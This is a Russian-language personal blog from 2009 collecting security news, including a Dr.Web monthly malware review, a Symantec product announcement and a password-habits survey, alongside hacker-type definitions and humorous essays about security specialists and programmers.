Поиск по этому блогу

9 сент. 2009 г.

The Truth about Facebook :

В августе я написал маленькую статейку о социальных сетях,так вот щас я наткнулся на видео которое это все объясняет :


Поучительное видео от SophosLabs

Facebook Fan Check Virus scare leads to malware :

8 сент. 2009 г.

Антивирус Symantec будет стучать на хакеров в полицию

Компания Symantec, известная своими антивирусными программными продуктами, намеревается резко изменить тактику защиты от кибератак - вплоть до перехода к нападению. В связи с этим, в новую версию Norton Internet Security, которая будет представлена завтра, 9 сентября, встроена функция по сбору сведений о попытках атаковать компьютеры пользователей и отправке этих данных в правоохранительные органы.

Помимо этого, на сайте Symantec будет постоянно поддерживаться информация о десяти наиболее опасных хакерах, разыскиваемых ФБР, а также об их мошеннических схемах. А со следующего года компания планирует выплачивать награду за информацию, которая позволит арестовать злоумышленников.

"Настало время прекратить разработку охранной сигнализации, препятствующей проникновению других людей, и начать охоту за плохими парнями", — уверен старший вице-президент компании по потребительской продукции Рован Троллоп.

Данный функционал будет включаться по желанию пользователей Norton Internet Security 2010 — примерно по той же схеме, по которой работает сеть Kaspersky Security Network. Но если сеть "Лаборатории Касперского" предназначена для оперативного сбора информации о новых угрозах с целью как можно быстрее добавить в базы новые сигнатуры, то новая технология Symantec позволяет выслеживать самих атакующих.

Технология, получившая несколько странное название Autopsy (т.е. "аутопсия", она же "вскрытие"), ставит подозрительное ПО, загружающееся на компьютер, на карантин и выдаёт пользователю предупреждение о том, что это ПО пришло из "неожиданного места". Сервис Norton Community Watch, также дебютирующий в версии 2010, собирает эти данные и отсылает в полицию.

Интересно, что в качестве типичных примеров "неожиданных мест" Business Week приводит Китай и Восточную Европу. С одной стороны, в выборе этих "неожиданных мест" нет ничего неожиданного, поскольку считается, что именно в этих странах количество хакеров на душу населения наиболее высоко. С другой стороны, однако, вредоносное ПО может загрузиться откуда угодно, тем более что вирусописатели довольно активно используют P2P-технологии.

Так или иначе, а в Symantec возлагают на свою "Аутопсию" большие надежды. Здесь уверены, что если раньше людей больше интересовала пассивная защита от вирусов, то сейчас всё большее количество пользователей готовы принять посильное участие в ответных действиях против хакеров.

И всё же оптимизм господина Троллопа внушает серьёзные сомнения. "Я убеждён, что мы очистим Интернет за 10 лет, если мы будем отколупывать грязь и показывать людям угрозы, которые перед ними стоят", — говорит он.


5 сент. 2009 г.

Доктор Веб: Вирусная активность в августе 2009 года

Компания «Доктор Веб» представила обзор вирусной активности в августе 2009 года. Главной темой месяца стала активность Win32.Induc – вируса, который заражает среду разработки Delphi. Не обладая ярко выраженным вредоносным функционалом, этот вирус, тем не менее, таит в себе весьма соблазнительный для злоумышленников потенциал, и потому его детектированию и лечению «Доктор Веб» уделяет такое же высокое внимание, как и к любой другой вредоносной программе. Наряду со средами программирования в прошлом месяце вирусописатели продолжили использовать возможности социальных сетей и испытанные методы социальной инженерии. Применялись и новые схемы распространения вредоносных программ и спам-сообщений – в частности, с использованием подбора captcha с помощью зараженных пользователей для авторизации на различных веб-ресурсах. Также «вышла боком» растущая популярность VoIP-телефонии – злоумышленники обернули эту тенденцию против пользователей.

Delphi и другие среды программирования под атакой

Уже несколько месяцев распространяется Win32.Induc – вирус, заражающий системы с установленной версией Delphi с 4-ой по 7-ую включительно. Он модифицирует одну из библиотек, использующуюся при сборке проектов. Таким образом, каждая программа, разработанная в модифицированной вирусом версии Delphi, уже заражена Win32.Induc.

Этот вирус не наносит видимого вреда зараженным системам – единственная его вредоносная функция заключается в самораспространении. Но в будущем ничто не мешает злоумышленникам использовать этот способ для распространения вредоносных программ. Несмотря на «безобидность» Win32.Induc, компания «Доктор Веб» видит в нем потенциальную опасность и уже сегодня предлагает его лечение.

Win32.Induc успел широко разойтись, поскольку попадал к пользователям вместе с популярными легальными программами, разработанными в зараженной среде Delphi. Вследствие этого, после добавления Win32.Induc в вирусные базы большинства антивирусных вендоров работа этих программ блокировалась, что доставило неудобства как пользователям, так и разработчикам. Однако после добавления записи, позволяющей лечить заражённые Win32.Induc файлы, в вирусные базы производителей средств информационной защиты, было отмечено резкое снижение активности этой вредоносной программы.

В августе также была обнаружена похожая вредоносная программа, ACAD.Siggen. В отличие от Win32.Induc она распространяется в виде модуля, реализованного в среде разработки Visual Lisp, которая используется в системе автоматизированного проектирования Autodesk AutoCAD. ACAD.Siggen заражает AutoCAD-файлы, открываемые в зараженной системе, так как запускается одновременно с AutoCAD.

Зарубежные социальные сети: рай для вирусописателей

Ввиду непрекращающегося роста своей популярности сервис микроблогов Twitter и известная зарубежная социальная сеть Facebook продолжают привлекать злоумышленников. К сожалению, доверчивость пользователей по отношению к сообщениям, содержащим заманчивые предложения посетить внешние ресурсы, все еще велика.

Уже давно известное семейство вирусов Win32.HLLW.Facebook в августе 2009 года предложило пользователям «поработать» на киберпреступников весьма изощрённым образом. Вирус, как и ранее, завлекает пользователя с помощью различных сообщений в социальных сетях на подставной ресурс, внешне очень похожий на легальный, с которого происходит загрузка якобы кодека для просмотра видеоролика. Если пользователь запускает загруженный исполняемый файл, происходит заражение. При этом интересна новая тенденция в технологиях обмана пользователей. Как известно, многие веб-сервисы защищают собственные ресурсы от автоматической регистрации пользователей, а также рассылки от их имени спам-сообщений. Для этого применяются различные технологии, которые позволяют подтвердить, что данное сообщение отправляет именно человек, а не программа-робот. Для проверки чаще всего применяется captcha – механизм, при котором пользователь должен ввести случайно генерируемую последовательность символов, которая представлена в виде изображения.

В последних версиях червя Win32.HLLW.Facebook появился любопытный модуль Win32.HLLW.Facebook.194, который осуществляет подбор captcha усилиями зараженного пользователя. Задача этого модуля – заставить пользователя ввести «правильную» комбинацию символов и отправить введенный результат на сервер злоумышленников. После того как задание на введение captcha получено с удаленного сервера, на зараженном компьютере всплывает окно с полем ввода, причем работа системы в этот момент блокируется.Благодаря действиям обманутого пользователя злоумышленники получают возможность создавать аккаунты на различных веб-сервисах с целью рассылки спама и новых фишинговых сообщений.

Другим инструментом злонамеренного использования социальных сетей стали управляющие команды для бот-сети в сообщениях одного из аккаунтов сервиса микроблогов Twitter. Команды представляли собой закодированные ссылки bit.ly (сервис сокращения ссылок), которые вели к ресурсам с вредоносными компонентами. После перехода по этим ссылкам заражённый компьютер получал команды через RSS-поток сообщений соответствующего аккаунта на Twitter. Подобную схему использовал Trojan.PWS.Finanz.410.

Маскировка управляющих команд для бот-сети была замечена и на другом сервисе микроблогов – Jaiku. Технология использована та же – закодированное сообщение в виде сокращенной ссылки ведет к вредоносному ПО, а получение управляющих команд происходит через RSS-поток.

Для злоумышленников подобные схемы привлекательны, в первую очередь, возможностью маскировки под легальный сетевой трафик и сложностью обнаружения. Тот же Twitter позволяет создавать закрытые аккаунты, содержимое которых доступно для ограниченного числа пользователей, что может затруднить обнаружение таких аккаунтов и их своевременную блокировку.

Обновление обновлению рознь. Угроза для пользователей Mozilla Firefox

Тему подставных сайтов продолжает вредоносная программа Adware.FF.1 – рекламный модуль, доставляющий неприятности поклонникам браузера Mozilla Firefox.

В современных условиях, когда злоумышленники постоянно обнаруживают уязвимости в популярном ПО, производители этих программ вынуждены регулярно выпускать обновления и настойчиво предлагать их своим пользователям. Многие уже привыкли к большому количеству предлагаемых обновлений операционной системы, антивируса, браузеров, даже текстовых редакторов. Злоумышленники решили воспользоваться частыми обновлениями от компании Adobe – Adware.FF.1 распространялся под видом ложного обновления для программы Adobe Flash Player. Причем ресурс, с которого происходило распространение этой вредоносной программы, внешне очень похож на оригинальный сайт Adobe. Кроме того, имя домена подставного сайта тоже призвано усыпить бдительность пользователей. Ссылки с некоторых его разделов ведут на оригинальный ресурс. Сам же рекламный модуль Adware.FF.1 после запуска лжеобновления устанавливает плагин для браузера Mozilla Firefox. Его задачей является подмена контекстной рекламы в поисковой системе Google. «Родственник» этого вируса, Adware.FF.3, дабы не вызывать подозрений пользователей, в своем установщике содержит ещё и оригинальный инсталлятор Adobe Flash Player.

Вирус в комплекте

Вирусописатели уже не первый раз используют повышенный интерес к выходу новых версий тех или иных популярных программ. Так, при выпуске офисного пакета от Apple – iWorks’09 – активно распространялся дистрибутив, содержавший троянца из семейства Mac.Iservice. На этот раз вирусописатели решили воспользоваться повышенным вниманием к Mac OS X Snow Leopard. Известны факты распространения через популярные торрент-трекеры зараженного дистрибутива этой ОС, содержащего вирус семейства Mac.DnsChange, при активации которого на компьютере осуществляется подмена DNS-запросов в процессе работы пользователя с браузером.

Телефония на службе киберпреступности

Другое важное событие, которое имело место в конце августа 2009 года – появление троянской программы-концепта Trojan.SkypeSpy, цель которой – захват аудио-потока из популярной программы Skype. При этом перехваченные переговоры записываются непосредственно в mp3-файл. Исходные коды Trojan.SkypeSpy стали достоянием общественности, что может повлечь за собой появление множества новых модификаций этого трояца. Однако специалисты «Доктор Веб» предполагают, что их распространение будет носить, скорее, локальный характер, нежели массовый – в силу того, что коммерчески выгодным является прослушивание переговоров в бизнес-среде с целью шпионажа, а не повсеместная «слежка» за пользователями Skype.

Данная программа еще раз подтверждает, что любая технология или сервис, получившие массовое распространение, привлекают внимание киберпреступников.

«Квитанция» на бот-сеть

С августа 2009 года наблюдалась активность трояна Trojan.Botnetlog.11, который распространяется под видом почтовых «квитанций».

Для того чтобы пользователь открыл данную «квитанцию», в письме сообщается о том, что он якобы отправил почтовое сообщение, но из-за неправильно указанного адреса оно не может быть доставлено. К письму приложен ZIP-архив, который определяется Dr.Web как Trojan.Botnetlog.11.

Примечательным является тот факт, что практически в каждой новой рассылке к пользователям приходит видоизменённый вариант этого троянца, используется специфический упаковщик. Но при этом технологии Dr.Web позволяют автоматически добавлять присылаемые в вирусную лабораторию новые варианты Trojan.Botnetlog.11, что значительно увеличивает качество защиты пользователей от данного типа угроз.

Более поздние варианты этой вредоносной программы Dr.Web определяет как Trojan.DownLoad.45107.

Фишинговый сайт в комплекте

В августе 2009 года широкое распространение получил вид фишинга, при котором форма, предназначенная для заполнения приватными данными пользователя, прикладывается в HTML-формате непосредственно к фишинговому письму. Данный файл, по задумке мошенников, пользователь должен открыть в браузере. Далее он должен заполнить форму и нажать подтверждающую кнопку. При этом данные отправляются на заранее подготовленный сервер.

Эта схема значительно упрощает организацию мошенничества, т.к. не требует создавать подставные сайты, которые могут быть в скором времени закрыты. Также возникает сложность с закрытием серверов, на которые попадают собранные приватные данные пользователей, т.к. доказать причастность сервера к данной схеме сложнее, чем при использовании классического фишинга. Подобная схема была использована в августе против пользователей платёжной системы PayPal и банка USAA.

Немного другая схема фишинга была использована в рассылке якобы от администрации системы Яndex.Деньги. Письмо было создано в HTML-формате, в его теле располагалась кнопка, нажав на которую, пользователь попадал на фишинговый сайт. В коде скрипта, который исполняется при нажатии кнопки, снова используется сервис сокращения ссылок.

Случаи классического фишинга были замечены по отношению к клиентам банков Ally Bank, Bank of America, Chase Bank, Key Bank, SunTrust Bank, а также по отношению к участникам интернет-аукциона eBay и пользователям платёжной системы PayPal.

Выводы

Win32.Induc, ставший основным вирусным событием месяца, породил множество дискуссий на тему того, нужно ли обнаруживать и лечить вирус, не наносящий явного вреда. Позиция компании «Доктор Веб» на этот счет однозначна: Win32.Induc нужно лечить, поскольку методы его распространения в дальнейшем могут использоваться злоумышленниками при создании вредоносных программ.

В центре внимания вирусописателей остаются и зарубежные социальные сети. Киберпреступники разрабатывают новые, более изощренные схемы их использования. Примером тому является управление бот-сетью через RSS-поток от Twitter-аккаунта. Увы, во многом на руку киберпреступникам продолжает играть наивность пользователей социальных сетей.

Интересную схему применили злоумышленники для вынуждения пользователей ввода captcha. Похоже, подобная схема встретится еще не раз, т.к. для защиты от автоматических регистраций captcha используется повсеместно, а способы автоматического подбора совершенствуются вирусописателями.

Доступность исходных кодов Trojan.SkypeSpy позволяет говорить о вероятном появлении новых вредоносных программ, использующих эту схему для перехвата разговоров пользователей Skype и пересылки их на сервер злоумышленников. По мнению специалистов «Доктор Веб», рядовым пользователям Skype это грозит в меньшей степени, нежели тем, кто использует это средство связи для ведения важных переговоров.

http://www.securitylab.ru/news/384708.php

Женcкие пароли надежнее мужских

Антивирусная компания PC Tools с целью выяснить отношение пользователей к вопросам безопасности провела опрос среди посетителей своего сайта, а также случайных граждан, встретившихся на улицах городов ряда европейских стран.

Оказалось, что женщины в Интернете зачастую ведут себя гораздо осмотрительнее мужчин — или же, по крайней мере, так они говорят. Например, только 26% представительниц слабого пола пользуются одним паролем на всех онлайн-ресурсах, в то время как среди мужчин этот показатель достигает 47%.

Также почти две трети мужчин позволяют себе тыкать на ссылки, полученные от друзей в электронных сообщениях, не попытавшись предварительно проверить источник. Женщины ведут себя чуть более осторожно — во всяком случае, половина из них.

Однако, несмотря на склонность к легкомыслию, интернетчики-самцы гораздо лучше подкованы теоретически. 85% из них отдают себе отчёт в том, что через веб-сайты, е-почту, аську и прочие каналы распространения и обмена информацией могут просачиваться также и всякие вирусы. В то же время 44% женщин даже не догадываются, что проверенные и авторитетные веб-сайты могут оказаться зараженными и нести угрозу.

Результаты опроса были разделены не только по половому, но и по национальному признаку. Больше всех на орехи досталось британцам и французам, отмечает The Tech Gerald.

Так, один пароль на все случаи жизни больше всего любят заводить жители Франции — 56%. В странах Бенилюкса количество беспечных пользователей несколько меньше — 45%, затем идут британцы (35%) и австралийцы (31%). Немцы проявили наибольшую щепетильность в этом вопросе: 84% из них оказались вполне способными запомнить больше одного пароля.

9% британцев выходят в Сеть вообще без какой-либо защиты, а около трети признались, что никогда не обновляют защитное программное обеспечение. Среди австралийцев таких безответственных граждан оказалось только 10%, среди французов — 7%, а среди жителей Германии, Бельгии, Нидерландов и Люксембурга — 5%.

В целом же выяснилось, что примерно каждый пятый пользователь не понимает сути угроз нулевого дня, а следовательно, не осознаёт необходимости в своевременной установке обновлений безопасности. Впрочем, такие выводы можно было сделать и без всякого опроса. Достаточно вспомнить, к примеру, о набившем оскомину черве Conficker, с которым недавно сражалась одна лондонская больница — почти через 9 месяцев после выхода официальной "заплатки".


29 авг. 2009 г.

Hacker attitudes

Hacker attitudes :

Several subgroups of the computer underground with different attitudes and aims use different terms to demarcate themselves from each other, or try to exclude some specific group with which they do not agree. Eric S. Raymond advocates that members of the computer underground should be called crackers. Yet, those people see themselves as hackers and even try to include the views of Raymond in what they see as one wider hacker culture, a view harshly rejected by Raymond himself. Instead of a hacker – cracker dichotomy, they give more emphasis to a spectrum of different categories, such as white hat (ethical hacking), grey hat, black hat and script kiddie. In contrast to Raymond, they usually reserve the term cracker to refer to black hat hackers, or more generally hackers with unlawful intentions.

White hat

A white hat hacker breaks security for non-malicious reasons, for instance testing their own security system. This type of hacker enjoys learning and working with computer systems, and consequently gains a deeper understanding of the subject. Such people normally go on to use their hacking skills in legitimate ways, such as becoming security consultants. The word 'hacker' originally included people like this, although a hacker may not be someone into security.

Grey hat

A grey hat hacker is a hacker of ambiguous ethics and/or borderline legality, often frankly admitted.

Black hat

A black hat hacker is someone who breaks computer security without authorization or uses technology (usually a computer, phone system or network) for vandalism, credit card fraud, identity theft, piracy, or other types of illegal activity.

Script kiddie

A script kiddie is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding. These are the outcasts of the hacker community.

Hacktivist

A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hactivism involves website defacement or denial-of-service attacks. In more extreme cases, hactivism is used as tool for Cyberterrorism

20 авг. 2009 г.

О социальных сетях

http://studenthacks.org/wp-content/uploads/2008/02/network.jpg


На дворе 2009 год уже скоро 2010,технология все прогрессирует и прогрессирует. Не буду говорить о постоянно нарастающей популяции компьютеров по всему миру,ведь сегодня даже с сотовых можно свободно зайти в интернет.В принципе даже и о сотовых нечего говорить -> появились нетбуки.Поскольку доступ к интернету стал возможным чуть ли не с ручных часов люди стали искать себе занятие и как ни странно нашли : "Социальные сети".

Конечно все звучит очень заманчиво "Найди своих одноклассников,старых друзей!","Общайся с друзями,заливай фото,создай группу..........................................................." - но кто нибудь пытался вообще задуматься что за этим всем может стоять или в каких целях можно использовать СС(социальные сети)? // Думаю что не многие...

А действительно в каких же а так же кто может использовать против нас СС?
Начнем с тех кто может использовать против нас СС : а именно -> начиная с правоохранительных органов и заканчивая террористами.

Правоохранительные органы например могут узнать о связях,местах встреч,увлечениях и т.д. и т.п.
Террористы же могут найти тех же сотрудников правоохранительных органов например и не толко. . .
Так же есть миллионы мошенников которые не спят по ночам и используют чужие данные для махинаций.
Еще один из многих скрытых недостатков СС : Стирая свою анкету с СС вы наверняка уверенны что решите все проблемы перечисленные выше?
На самом деле нечего не стирается а остаётся на сервере той же СС(может и есть честные социальные сети -> но я в это не верю),да вы не видите своей анкеты и доступа ваших друзей или других людей к ней нет,но поверьте если кому нибудь нужен будет к ней доступ он его получит.

/* Лазия по СС будьте бдительными поскольку приложения в них или даже простые сообщения могут быть заражены или могут собирать информацию о вас для какого нибудь плохого дяденьки или тетеньки... */

Послушать или скачать podcast вы можете здесь : http://4erv.rpod.ru
YuV4iK

Я - жена специалиста по ИБ

Ну и какого же это быть женой специалиста по информационной безопасности?», - спросите вы. Я вот еще в раннем детстве зареклась, что никогда не выйду замуж за человека, у которого основная деятельность замыкается на этом непонятном ящике. Я всегда была уверена, что это помешанные люди, которые, ко всему прочему, страсть как не любят, чтобы их называли айтишниками и компьютерщиками! Категорично не признают таких сокращений относительно себя. А сами же сокращают все что можно и нельзя. А как они разговаривают друг с другом? «железо на борту», «линуксы», «аутглюки», «девайсы», «фича». Бррр…. Как инопланетяне, ей-богу! Когда я слышу такие разговоры, где из нормальных понятных русских слов присутствуют только союзы, у меня мозги закипают…

Ну, так вот, зареклась я от брака с компьютерщиком еще в раннем детстве и всю свою сознательную юношескую пору этих инопланетных существ избегала. Да не тут - то было. Жизнь сыграла со мной злую шутку. «Авось пронесет….», - думала я по дороге в ЗАГС. «Компьютерщики, хоть и злодеи, но тоже люди…», - наивно полагала я.

После свадьбы вся романтика обычно сменяется бытовухой. Это у нормальных людей. У меня же вся прелесть сказки только начиналась.

Практически в первый день законной жизни, мой благоверный заявил, что, так как я теперь жена специалиста по информационной безопасности, я должна быть как MacOs круче всех, простой в общении как Notepad, и многозадачной как Red Hat .

Дальше, больше. Специфика его професии начала пускать корни в нашу реальную совместную жизнь. Так, однажды я решила совершить плодотворный забег в торговый центр и накупить кучу всего нужного и ненужного. Муж у меня в этом деле продвинутый и поэтому с удовольствием согласился составить мне компанию и помочь с выбором той или иной вещицы. Когда пришло время расплачиваться, я, не имея наличных, достала пластиковую карточку, протянула ее кассиру и в это же время краем глаза заметила, как улыбка мужа сменяется гримасой ужаса. Оказывается мне ни в коем случае нельзя пользоваться пластиковыми картами в магазинах!!! После моего продолжительного визга и его нравоучений, мне пришлось покорно оставить все несостоявшиеся покупки и гордо удалиться ни с чем, под недоумевающие взгляды продавцов и покупателей…. Как оказалось, дело все в том, что пластиковые карты хоть и облегчают оборот денег, но являются крайне опасной штукой. Так как в магазине или ресторане уполномоченные лица для расплаты снимают «слип» карты. И если это уполномоченное лицо окажется не совсем честным и подсмотрит мои последние три цифры на обороте карточки, то я могу попрощаться со всей суммой на банковском счете, так как он, имея эти данные, может провернуть выгодную для себя аферу и нажиться на мне. В дополнение к любимым магазинчикам и милым ресторанчикам добавляется, с виду безобидный, скромный банкомат. Ни в коем случае нельзя снимать с него деньги, так как мошенники могут не только по шапке дать после получения мною наличных, но и встроить в банкомат специальные устройства, позволяющие «откатать белый пластик». Плюс, с помощью аккуратно установленной камеры, могут подсмотреть мой пин-код. И снова, до свидания денежки. Вот и приходиться каждый раз крутить головой вокруг банкомата, высматривая со всех сторон «что-нибудь подозрительное».

Я думала, работа моего мужа по сохранности информации распространяется только на компьютеры, банкоматы и подобного рода машины. Но как оказалось, дело с живыми людьми обстоит гораздо сложнее. Мало того что банковскую карточку нельзя давать кому попало так еще, как это не печально, под «гриф секретности» попадает и паспорт. С его помощью, также можно провернуть массу всевозможных махинаций. Поэтому нельзя давать его никому в руки! Особенно позволять делать ксерокопию (кроме кадровиков, приемной комиссии в ВУЗЕ, посольства – эти люди несут уголовную ответственность за сохранность персональных данных). Иначе злодей, заполучив ксерокопию моего паспорта и имея своего человека в банке, может с легкостью взять на мое имя кредит и скрыться. Поэтому за паспортом нужен глаз да глаз. Ну а теперь можно представить, как на меня смотрят, когда я категорично отказываюсь отдавать свои документы кому бы то ни было в руки. В банке я с умным лицом прикладываю паспорт к стеклу, хотя барышни – кассиры привыкли к проверки паспорта из своих рук. В результате чего бедная кассирша мучается, всматривается в него и очень злиться на мою чрезмерную осторожнность. Хорошо, что дело до милиционеров не дошло! А то я представляю, какого будет возмущение, когда я откажусь дать ему паспорт в руки, цитируя при этом выдержки из закона о том что, гражданин для установления его личности не должен отдавать документы стражам порядка, иначе тот же паспорт будет считаться конфискованным.

Ну и самое интересное, как оказалось, мне категорично запрещено пользоваться социальными сетями, нельзя создавать свои странички и вести блоги. Потому что это все, по его словам, «ой как опасно»! Ведь в интернете про меня, а теперь еще и про него вся информация выложена, от моей даты рождения до общих фотографий! А вдруг кто – нибудь корыстно воспользуется данной информацией?! Но все же, я не сдаюсь. Я упрямо стою на своем и не спешу пока удаляться из так полюбившихся сайтов… Мужу, конечно, это, жуть как, не нравится…. Но, после моих многочисленных уступок и честному следованию его правилам, соизволил закрыть глаза на это небольшое нарушение информационной безопасности. Но, конечно же, с одним «но». Все что я публикую, проходит жесткую цензуру.

Отдельный вопрос стоит с паролями на те же любимые социальные странички. Пароль должен быть сложным и иметь не менее двенадцати символов, да еще состоять из букв и цифр. Это кошмар! После долгих раздумий я, наконец-то, придумала такой пароль. Но как оказалось – категорично нельзя его записывать никуда на бумагу. Его нужно держать только в голове и никому не рассказывать, даже под страхом смертной казни! Конечно же, таким юным особам, как мне, не до паролей в этом мире. У меня и своих очень важных мыслей в голове хватает! А тут еще пароль помнить! Приходиться каждый раз как «отче наш» по утрам и вечерам повторять его. В противном случае мне грозит смена пароля с последующем сочинением другого, не менее сложного и длинного, слово - либо цифросочетания. Но как оказалось, это полбеды. Один - то пароль я, может, и осилила бы. Но на каждом ресурсе, а у меня их много, они должны быть индивидуальными. Что бы взломщики не расслаблялись. Плюс ко всему прочему я не должна забывать об их массовой смене периодичностью раз в месяц! Бедная моя голова!

Необходимо быть особенно внимательной и к вводу своих персональных данных в анкету при регистрации и паролей на страницу авторизации. Запрос номера банковской карточки и паспортные данные, например, при осуществлении покупки через интернет, могут осуществляется с целью мошенничества. Злоумышлинники создают сайты двойники, с целью выуживания информации. Необходимо быть особо внимательной, открывая какую либо страницу в интернете, каждый раз обращая внимания на адрес ссылки, который в свою очередь не должен содержать «левых» слов, а состоять из основного наименования компании или продукта (включая допустимые адресные добавления).

Конечно, на первый взгляд эти все предосторожности казались маразмом, попахивали клиникой и отсвечивали паранойей…. Но, как выяснилось, они играют - таки свою роль в этом безумном мире. Я, конечно, не зацикливаюсь и не страдаю манией преследования, но благодаря мужу, со мной пока ничего не случается. Из-за халатного отношения к своим личным данным и желанию рассказать о себе всему свету, мои горе - подружки уже поплатились… У одной несколько тысяч долларов увели с карты; другую через социальные сети, после выкладывания откровенных фото какой-то маньяк шантажирует; у третьей с ее личной почты спам постоянно рассылается; на четвертую кредит взяли; пятую по телефону, который она оставляла на всевозможных сайтах, развели на приличную сумму…. В общем, информационная безопасность – далеко не последняя ступень в нашем современном мире. Вместе с развитием информационных технологий растет и уровень преступности, использующий последних в качестве материала по разводу лохов.

Так что выходите девки замуж за компьютерщиков! Они хоть и странные, но надежные!

Васильева Ирина

Источник: http://www.securitylab.ru/contest/383853.php

Старая но поучительная статейка : "Хакер в столовой"

День первый
Хакер приходит в общественную столовую и с возмущением обнаруживает, что солонку на столе может открутить кто попало и насыпать туда что угодно. Хакер приходит домой и пишет гневное письмо директору столовой: "Я, meG@Duc, обнаружил уязвимость солонки в Вашей столовой. Злоумышленник может вскрыть солонку и насыпать туда яду! Примите меры срочно!"

День второй
Директор среди прочих деловых писем, запросов о поставках еды и курьерских уведомлений получает письмо, и пожимает плечами: "Кому этот бред только в голову пришёл?"

День пятый
Хакер приходит в столовую, насыпает во все солонки яду. Погибает триста человек, директора три месяца таскают по судам и, в конце концов, оправдывают за отсутствием состава преступления. Хакер пишет письмо в стиле "ну что, видали?".

День 96-ой
Директор покупает специально спроектированные солонки с кодовым замком. Посетители столовой чувствуют, что они в этой жизни чего-то не понимают.

День 97-ой
Хакер обнаруживает, что дырки в солонках пропускают соль в обе стороны. И не только соль, а вообще всё, что угодно. Он пишет возмущенное письмо директору и ссыт во все солонки столовой. Триста человек перестают посещать эту столовую вообще, тридцать попадают в больницы с отравлением. Хакер вдогонку посылает директору смс-ку "Ну как вам?". Директора тем временем три месяца таскают по судам и дают год условно.

День 188-ой
Директор столовой клянется в жизни больше не работать ни в одной столовой, а тихо-мирно грузить лес в Сибири. Инженеры работают над новой солонкой с односторонним клапаном. Официантки тем временем изымают все старые солонки и раздают соль вручную.

День 190-ый
Хакер тырит солонку из столовой и изучает дома её устройство. Пишет гневное письмо директору: "Я, meG@Duc, стырил солонку и нахожу этот факт возмутительным! Любой может стырить солонку из Вашей столовой!" До этого непьющий директор читает письмо, идет домой и выпивает водки.

День 193-ый
Хакер обнаруживает, что все солонки в столовой прибиты цепями к столам. Он приезжает на очередной хакерский СПРЫГ и докладывает о своих успехах, получая там заслуженную награду за защиту интересов общества и потребителя. К счастью, директор ничего про это не знает и не сопьется раньше времени.

День 194-ый
В рамках дьявольски гениально продуманной операции хакеры всем СПРЫГом вламываются в столовую и высыпают соль из всех солонок себе в карманы. Хакер meG@Duc пишет возмущенное письмо директору, намекая на то, что никакой заботы о посетителях в столовой нет и любой гад может лишить честных людей соли в одно мгновение. Дозатор соли с авторизацией необходим просто позарез.

Инженеры в поте лица работают над новой солонкой, пока официантки опять раздают соль вручную. Директор уезжает в отпуск на Сейшельские острова и обедает только в номере, избегая столовых, ресторанов и баров.

День 200-ый
Посетители столовой с ужасом находят, что, чтобы насыпать соли, они должны подойти к официанту, предьявить паспорт, получить специальный 8-значный одноразовый код к солонке. Для получения перца процедуру следует повторить.

16 авг. 2009 г.

Основой нового общества станут программисты

Основой нового общества станут программисты. То есть, как после атомного взрыва выживут тараканы и крысы, так после постмодернизма, "смерти взрослых", социального кризиса и окончательного исчезновения реальности выживут программисты. Я практически уверена. Они будут господствующей разумной формой жизни на Земле, потому что именно они обладают всеми признаками, обеспечивающими выживание.

Во-первых, программисты это одна из немногих социальных групп, которые сейчас производят продукт. Причем продукт такой, без которого современный мир существовать не в состоянии. А как мы помним из Смита и Маркса - продукт это архиважная фигня, и тот, у кого он есть практически не может продуть в борьбе за блага.

Во-вторых, программисты сохраняют матримониальное поведение, чем так же повышают свои шансы на выживание. В отличие от остальных они создают семьи, которые как известно, являются наиболее устойчивой социальной формой существования.

Идея о том, что программисты это жуткие тщедушные, занудные задроты, которые естественным образом выпадают из процесса размножения - ошибочна. Во-первых, они бывают разные, во-вторых, разбирают всех! Честно вам говорю. Причем жутких и тщедушных быстрее остальных. Потому что, на самом деле, программист это весьма подходящая для семейной жизни штуковина! Он безобиден, тих, верен и зарабатываем много денег. А самое главное, программист хочет жениться, потому что добывать секс и еду в борьбе на вольных выпасах ему не интересно, лениво, да и просто страшно. В результате он с радостью покоряется первой же девушке, которая решит отвести его в ЗАГС.

Разводится программист тоже только в одном случае - если сходит на психологический тренинг, но это бывает крайне редко. Да и то, он потом сразу же снова женится, на чем-то аналогичном. В результате программистские семьи просто нереально показательно крепки.

Третье. Как известно, залогом выживания вида является размножение. И, я скажу вам, программисты размножаются! У нас в конторе на 80 сотрудников уже около 60 детей. У многих по двое, у некоторых по трое.

Происходит это потому, что средний программист уютнее и увереннее всего ощущает себя в положении "уткнувшись в комп". Он допоздна торчит на работе, а когда приходит домой, то снова принимает удобное положение. В это время его жена стервенеет от невнимания и скуки. Первый год она надеется, что все изменится, второй - скандалит, на третий плюет, рожает и начинает развлекаться самостоятельно ребенком. Для программиста ребенок это практически единственный способ сделать так, чтобы жена была относительно удовлетворена и отстала от него. Правда приколюхи хватает года на два, потом ей снова становится скучно и тогда заводят второго, благо денег хватает.

В общем, пока крутые доминирующие самцы хлещутся в страстях, пьянках и интригах, программисты тихо делают свое дело. Угадайте, чьих детей в итоге будет больше?

В-четвертых, программисты обладают завидной психологической устойчивостью. Если программист пережил институт (говорят на математических и IT-шных факультетах самый большой процент сходов с катушек), то он практически неуязвим в психологическом плане. Дело в том, что программисты воспринимают и строят жизнь как некий алгоритм с ответвлениями возможных вариаций. Их мир стабилен и прост, а объективная реальность интересует слабо. Вчера два сотрудника спросили меня: "Маш, а че все по какой-то кризис раздувают, расскажи, а?" Вчера! От этого у программистов не бывает страхов, серьезных жизненных сомнений и не случается неожиданностей. Так же у них, по большей части, напрочь отсутствует навык рефлексии, поэтому, даже имеющиеся у них комплексы, они не ощущают. Тот дискомфорт и неуверенность которые они, возможно, испытывают в реальном мире проходят у них по графе "невнятных ощущений" и, не получая никакого развития, просто игнорируются.

Устойчивости им добавляет еще и то, что большинство программистов действительно любят свою работу и получают от нее моральное удовлетворение. Они творят! Какой процент остальных людей может похвастаться тем же? Вооот. При этом, им не нужно нюхать кокс и тусоваться ночами как киношникам и музыкантам.

Словом, в то время как весь остальной мир тщетно носится по психоаналитикам и бухает от непонятной тоски, программисты чувствуют себя в полном порядке.

